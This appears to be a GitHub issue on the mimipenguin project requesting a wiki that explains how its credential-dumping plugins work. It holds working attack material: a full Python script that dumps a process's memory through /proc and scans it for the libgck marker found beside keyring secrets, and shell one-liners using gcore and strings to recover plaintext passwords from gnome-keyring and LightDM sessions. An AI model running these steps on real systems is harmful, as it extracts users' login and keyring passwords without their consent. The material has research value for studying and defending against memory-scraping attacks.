Create a wiki
KINGSABRI opened this issue · 2 comments
Feature request
As this script is getting more attention, each plugin has its own way and could need some research, of course.
The idea is, we create a wiki for each feature to explain the main issue and how to reproduce it manually. So, people who try to add or use these features will have a good understanding to build the same script in another language and add more features to existing scripts.
Expected behavior
To have something like a knowledge base that explains each plugin/feature (not code) of mimipenguin
Reproduce Steps
To dump Linux memory for a specific process to disk, we need the following:
Gdm
- Get process id (PID):
/proc/[PID]/cmdline
cmdline is a file that holds the complete command line for the process.
- Get PID maps:
/proc/[PID]/maps
maps is a file containing the currently mapped memory regions and their access permissions.
- Get process memory pages:
/proc/[PID]/mem
mem is a file that can be used to access the pages of a process's memory through
- Search for ^.+libgck\-1\.so\.0$ in the memory dump
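The procedure above, carried through as an added Python example (this is not mimipenguin's own code): it finds a PID by matching /proc/[PID]/cmdline, parses /proc/[PID]/maps, copies every readable mapping out of /proc/[PID]/mem into a dump file, then runs a strings-plus-regex scan over the dump with the libgck pattern. All function and variable names are assumptions, and SAMPLE_MAPS and SAMPLE_DUMP (including the hunter2 string) are constructed test data, not output from a real session. Two practical caveats are handled: [vvar] and [vsyscall] show up as readable in maps but return EIO from mem, so they are skipped, and reading another user's process needs root or CAP_SYS_PTRACE while your own process is always readable.

```python
"""Dump a Linux process's memory via /proc and grep it, mimipenguin-style.

Added example, not mimipenguin's own code. SAMPLE_MAPS and SAMPLE_DUMP are
constructed test data so the parsing and scanning can be exercised offline.
"""
import os
import re
from dataclasses import dataclass

# Regex from the GDM step above, applied to each printable string of the dump
# the way `strings dump | grep -E '^.+libgck\-1\.so\.0$'` would be.
LIBGCK_PATTERN = re.compile(rb"^.+libgck\-1\.so\.0$")
# maps lists these as readable, but /proc/[PID]/mem returns EIO for them;
# skipping them keeps one bad region from aborting the whole dump.
UNREADABLE_PSEUDO = {"[vvar]", "[vsyscall]"}

# Constructed sample data (not captured from a real process).
SAMPLE_MAPS = (
    "55d7e1a00000-55d7e1a21000 r--p 00000000 08:01 1234 /usr/bin/gnome-keyring-daemon\n"
    "7f00deadb000-7f00deadc000 ---p 00000000 00:00 0\n"
    "7ffc3e5f0000-7ffc3e5f4000 r--p 00000000 00:00 0 [vvar]\n"
)
SAMPLE_DUMP = (b"\x00\x00GNOME_KEYRING_CONTROL\x00hunter2\x00"
               b"/usr/lib/x86_64-linux-gnu/libgck-1.so.0\x00\x7f\x01bin\x00")


@dataclass
class Region:
    start: int
    end: int
    perms: str
    path: str

    @property
    def readable(self) -> bool:
        return self.perms.startswith("r") and self.path not in UNREADABLE_PSEUDO


def parse_maps(maps_text: str) -> list:
    """Parse /proc/[PID]/maps text. Each line is
    start-end perms offset dev inode [path]; anonymous mappings have no path."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split(maxsplit=5)
        if len(fields) < 5:
            continue
        lo, hi = fields[0].split("-")
        path = fields[5] if len(fields) == 6 else ""
        regions.append(Region(int(lo, 16), int(hi, 16), fields[1], path))
    return regions


def find_pids(needle: str, proc_root: str = "/proc") -> list:
    """PIDs whose /proc/[PID]/cmdline contains `needle`. cmdline is
    NUL-separated, so argv is joined with spaces before matching."""
    pids = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace")
        except OSError:  # process exited or is not ours to inspect
            continue
        if needle in cmdline:
            pids.append(int(entry))
    return pids


def dump_process_memory(pid: int, out_path: str) -> int:
    """Copy every readable mapping of `pid` into out_path; return bytes written.
    Other users' processes need root/CAP_SYS_PTRACE (ptrace access check)."""
    written = 0
    with open(f"/proc/{pid}/maps") as fh:
        regions = [r for r in parse_maps(fh.read()) if r.readable]
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem, \
            open(out_path, "wb") as out:
        for region in regions:
            try:
                mem.seek(region.start)  # mem is addressed by virtual address
                chunk = mem.read(region.end - region.start)
            except (OSError, OverflowError):  # region vanished or EIO
                continue
            out.write(chunk)
            written += len(chunk)
    return written


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Like `strings -n min_len`: runs of printable ASCII."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)


def grep_dump(blob: bytes, pattern=LIBGCK_PATTERN, context: int = 2) -> list:
    """Like `strings dump | grep -E pattern -B context -A context`: returns
    the printable strings surrounding each match."""
    lines = extract_strings(blob)
    hits = []
    for idx, line in enumerate(lines):
        if pattern.search(line):
            hits.extend(lines[max(0, idx - context):idx + context + 1])
    return hits


if __name__ == "__main__":
    # Self-check on this very process: plant a marker, dump, and find it.
    marker = b"planted-marker-libgck-1.so.0"
    size = dump_process_memory(os.getpid(), "/tmp/self.dump")
    with open("/tmp/self.dump", "rb") as fh:
        found = any(marker in s for s in grep_dump(fh.read()))
    print(f"dumped {size} bytes, marker found: {found}")
```

The pattern is a parameter of grep_dump, so the same scan serves any other marker string; against a real target you would call find_pids with a fragment of the target's command line, pass the PID to dump_process_memory, and run grep_dump over the file.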
+1
I noticed the wiki hasn't been created yet, so here are some notes for gnome-keyring and LightDM.
Note that the steps provided are simply to verify the issue and may differ slightly from the techniques used in mimipenguin.
gnome-keyring
- Original report and PoC by xivoct
Steps to reproduce:
# gcore $(pgrep gnome-keyring)
# strings core.* | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10
LightDM
- Original report and PoC by Sven Blumenstein
Steps to reproduce:
# gcore $(ps -eo pid,command | grep lightdm | grep session-child | awk -F ' ' '{ print $1 }')
# strings core.* | grep -E '^_pammodutil_getspnam_' -A1